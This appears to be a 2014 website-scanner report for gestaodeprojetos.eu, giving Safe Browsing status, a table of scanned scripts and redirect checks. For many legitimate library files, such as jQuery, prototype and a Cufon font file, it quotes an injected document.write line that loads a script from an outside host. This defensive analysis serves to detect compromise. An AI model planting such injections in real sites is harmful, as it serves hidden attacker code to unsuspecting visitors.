Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gestaodeprojetos.eu
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://gestaodeprojetos.eu/ | 200 OK Content-Length: 14298 Content-Type: text/html | clean |
http://gestaodeprojetos.eu/js/jquery-1.6.2.min.js | 200 OK Content-Length: 91692 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://m-servis.cz/vz46dX9J.php?id=10566304"></script>'); | ||
http://gestaodeprojetos.eu/js/jquery.easing.1.3.js | 200 OK Content-Length: 8233 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://m-servis.cz/vz46dX9J.php?id=10566305"></script>'); | ||
http://gestaodeprojetos.eu/js/jquery.transform-0.9.3.min.js | 200 OK Content-Length: 20386 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://m-servis.cz/vz46dX9J.php?id=10566307"></script>'); | ||
http://gestaodeprojetos.eu/js/jquery.stackGallery.min.js | 200 OK Content-Length: 7388 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://m-servis.cz/vz46dX9J.php?id=10566306"></script>'); | ||
http://cufon.shoqolate.com/js/cufon-yui.js | HTTP/1.1 301 Moved Permanently Connection: close Date: Sun, 27 Apr 2014 19:53:40 GMT Location: http://cdnjs.cloudflare.com/ajax/libs/cufon/1.09i/cufon-yui.js Server: lighttpd/1.4.19 Content-Length: 0 | clean |
http://cdnjs.cloudflare.com/ajax/libs/cufon/1.09i/cufon-yui.js | 200 OK Content-Length: 18258 Content-Type: application/javascript | clean |
http://gestaodeprojetos.eu/js/cufon/bebas-neue.cufonfonts.js | 200 OK Content-Length: 171877 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://m-servis.cz/vz46dX9J.php?id=10566308"></script>'); | ||
http://gestaodeprojetos.eu/sapphire/thirdparty/prototype/prototype.js?m=1398603237 | 200 OK Content-Length: 56812 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://m-servis.cz/vz46dX9J.php?id=10566597"></script>'); | ||
http://gestaodeprojetos.eu/sapphire/thirdparty/behaviour/behaviour.js?m=1398603156 | 200 OK Content-Length: 19803 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://m-servis.cz/vz46dX9J.php?id=10566544"></script>'); | ||
http://gestaodeprojetos.eu/sapphire/javascript/prototype_improvements.js?m=1398603140 | 200 OK Content-Length: 8442 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://m-servis.cz/vz46dX9J.php?id=10566533"></script>'); | ||
http://gestaodeprojetos.eu/sapphire/javascript/i18n.js?m=1398603133 | 200 OK Content-Length: 6049 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://m-servis.cz/vz46dX9J.php?id=10566528"></script>'); | ||
http://gestaodeprojetos.eu/sapphire/javascript/lang/en_US.js?m=1398603148 | 200 OK Content-Length: 1232 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://m-servis.cz/vz46dX9J.php?id=10566538"></script>'); | ||
http://gestaodeprojetos.eu/sapphire/javascript/Validator.js?m=1398603132 | 200 OK Content-Length: 7969 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://m-servis.cz/vz46dX9J.php?id=10566527"></script>'); | ||
http://gestaodeprojetos.eu/objectivos/ | 200 OK Content-Length: 14713 Content-Type: text/html | clean |
http://gestaodeprojetos.eu/objectivos/js/jquery-1.6.2.min.js | 404 Not Found Content-Length: 782 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gestaodeprojetos.eu
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 27 Apr 2014 19:39:17 GMT
Pragma: no-cache
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Type: text/html; charset="utf-8"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=c72c5552f8619b45c22f60581649de16; path=/; HttpOnly
Set-Cookie: bypassStaticCache=deleted; expires=Sat, 27-Apr-2013 19:39:17 GMT; path=/; httponly
Set-Cookie: bypassStaticCache=deleted; expires=Sat, 27-Apr-2013 19:39:17 GMT; path=/; httponly
X-Powered-By: PHP/5.2.17
GET / HTTP/1.1
Host: gestaodeprojetos.eu
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 27 Apr 2014 19:39:17 GMT
Pragma: no-cache
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Type: text/html; charset="utf-8"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=c72c5552f8619b45c22f60581649de16; path=/; HttpOnly
Set-Cookie: bypassStaticCache=deleted; expires=Sat, 27-Apr-2013 19:39:17 GMT; path=/; httponly
Set-Cookie: bypassStaticCache=deleted; expires=Sat, 27-Apr-2013 19:39:17 GMT; path=/; httponly
X-Powered-By: PHP/5.2.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: gestaodeprojetos.eu
Referer: http://www.google.com/search?q=gestaodeprojetos.eu
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: gestaodeprojetos.eu
Referer: http://www.google.com/search?q=gestaodeprojetos.eu
Result:
The result is similar to the first query. There are no suspicious redirects found.